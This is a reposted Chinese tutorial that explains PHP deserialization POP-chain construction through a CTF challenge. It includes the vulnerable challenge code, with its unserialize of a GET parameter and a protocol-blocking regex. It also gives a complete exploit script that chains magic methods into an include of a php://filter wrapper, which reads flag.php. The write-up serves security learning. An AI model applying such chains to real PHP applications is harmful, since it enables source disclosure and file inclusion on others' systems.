首頁 >後端開發 >php教程 >詳細介紹php反序列化pop鏈構造知識點

詳細介紹php反序列化pop鏈構造知識點

WBOY
WBOY轉載
2022-05-05 18:42:215641瀏覽

這篇文章為大家帶來了關於PHP的相關知識,其中主要介紹了關於pop鏈構造的相關問題,pop鍊是一種面向屬性編程,常用於構造調用鏈的方法,下面一起來看一下,希望對大家有幫助。

詳細介紹php反序列化pop鏈構造知識點

推薦學習:《PHP影片教學

隨著對反序列化學習的不斷深入,我們來學習一下pop鏈的構造。這個pop鏈對於我這種小白來說還是比較難理解的,再次寫下這篇文章總結一下,加深自己對構造pop鏈的理解。同時也是提供想要入坑的夥伴們一些理解。

pop鏈構造

一般的反序列化題目,存在漏洞或能注入惡意程式碼的地方在魔術方法中,我們可以透過自動呼叫魔術方法來達到攻擊效果。但是當注入點存在普通的類別方法中,透過前面自動呼叫的方法就失效了,所以我們需要找到普通類與魔術方法之間的聯繫,理出一種邏輯思路,透過這種邏輯思路來構造一條pop鏈,從而達到攻擊的目的。所以我們在做這類pop題目一定要緊盯魔術方法。

pop鏈簡介

它是一種物件導向編程,常用於建構呼叫鏈的方法。在題目中的程式碼裡找到一系列能呼叫的指令,並將這些指令整合成一條有邏輯的能達到惡意攻擊效果的程式碼,就是pop鏈(個人理解,歡迎師傅們提出意見)在構造pop鏈中,魔術方法必不可少。以下將透過一個範例來說pop鍊是怎麼建構的,以及具體建構的想法

上題目程式碼:

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

建構想法

##在建構呼叫鏈時,先找到呼叫鏈的頭和尾。頭一般都是能傳參以及可以反序列化的地方,而尾部一般都是可以執行惡意程式碼的地方。審計這個題的程式碼,頭是用get方式對pop傳參,而尾部是include包含函數。到這裡,我們應該都知道是要用php偽協定讀取flag檔的源碼。既然頭和尾都找到了,也知道攻擊方法了。那麼接下來找到題目中的魔術方法。

__invoke()    当一个类被当作函数执行时调用此方法。

__construct   在创建对象时调用此方法

__toString()  在一个类被当作字符串处理时调用此方法

__wakeup()    当反序列化恢复成对象时调用此方法

__get()       当读取不可访问或不存在的属性的值会被调用
題中一共有這五種魔術方法。接著找出普通類與魔術方法之間的關聯。

不難看出wakeup函數中有個preg_match函數,用於查找source中敏感的字串,我們可以從這裡開頭,將source賦予一個show類,那麼就會自動觸發toString函數,那麼現在就要在tostring方法中延申鍊子,那麼我們可以在totring方法中$this->str賦予test類,在test類讀取source變量,(因為test類中沒有source屬性,則是訪問了不可訪問的屬性)則會自動呼叫get魔術方法。可以發現get方法中有個函數調用,則我們可以將$this->p賦予Modifier類,會自動調用invoke方法,從而執行我們寫入的php偽協議(將Modifer類中的var屬性賦值為我們的惡意程式碼)

至此,我們建構pop鏈。

pop鏈講解

<?php
class Modifier {
	protected $var=&#39;php://filter/read=convert.base64-encode/resource=flag.php&#39;;
}
class Show{
	public $source;
	public $str;
	function _construct(){
		$this->source=$file;
	}
}
class Test{
	public $p;
}
$a = new show();
$b = new show();
$c = new test();
$d = new Modifier();
$a->source=$b;
$b->str=$c;
$c->p= $d;
echo urlencode(serialize($a));
?>

先把用到的類別寫出來,形成一個框架,再表示類別中的變數。分別將用到的類別進行實例化,這裡為什麼要new 兩次show(看程式碼應該能看懂,第一次是實例化show類別,第二次是將第一次實例化後的show類別中的source=第二次實例化的show)

在我們進行序列化的時候盡量用url編碼一下(在這個題中有protected修飾的屬性,會有不可見字元)

推薦學習:《

PHP影片教學

以上是詳細介紹php反序列化pop鏈構造知識點的詳細內容。更多資訊請關注PHP中文網其他相關文章!

陳述:
本文轉載於:csdn.net。如有侵權,請聯絡admin@php.cn刪除